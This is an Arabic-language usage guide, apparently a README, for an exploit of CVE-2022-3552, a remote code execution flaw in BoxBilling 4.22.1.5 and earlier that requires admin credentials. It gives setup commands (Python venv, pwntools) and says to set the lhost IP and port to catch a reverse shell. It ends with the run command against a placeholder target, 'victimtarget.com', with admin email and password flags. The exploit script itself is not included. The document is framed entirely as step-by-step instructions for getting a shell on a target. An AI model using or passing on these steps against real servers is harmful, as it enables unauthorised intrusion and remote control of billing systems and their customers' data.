
CVE-2022-3552 RCE مع خطوات استغلال مفصلة
لاستغلال الثغرة في BoxBlilling، يجب أن تكون النسخة: "BoxBilling<=4.22.1.5" ويجب أن يكون لديك بيانات اعتماد مسؤول صالحة.
إذا كانت لديك الحالة المذكورة أعلاه، فإليك الخطوات التي يجب عليك اتباعها للحصول على RCE الممتاز:
إنشاء بيئة افتراضية بايثون (لينكس)
python3 -m venv .venv
source .venv/bin/activate
الآن قم بتثبيت مكتبة pwntools هذه
pip3 install pwntools
إذا اشتكى من تبعيات مفقودة، فقد تحتاج أيضًا إلى تثبيت بعض حزم النظام:
sudo apt update
sudo apt install python3-pwntools
في الكود هناك بضعة أسطر تتطلب تعديلًا، وهي الأسطر التي تحدد عنوان IP lhost والمنفذ الذي تخطط لاصطياد الصدفة به.
إذا قمت بكل ذلك بشكل صحيح، يجب أن تكون قادرًا الآن على تشغيل الاستغلال والحصول على شل! (-d = الهدف، -u = بريد إلكتروني صالح للمسؤول، -p = كلمة مرور المسؤول الصالحة)
python3 CVE-2022-3552.py -d http://victimtarget.com -u [email protected] -p enterpassword1HERE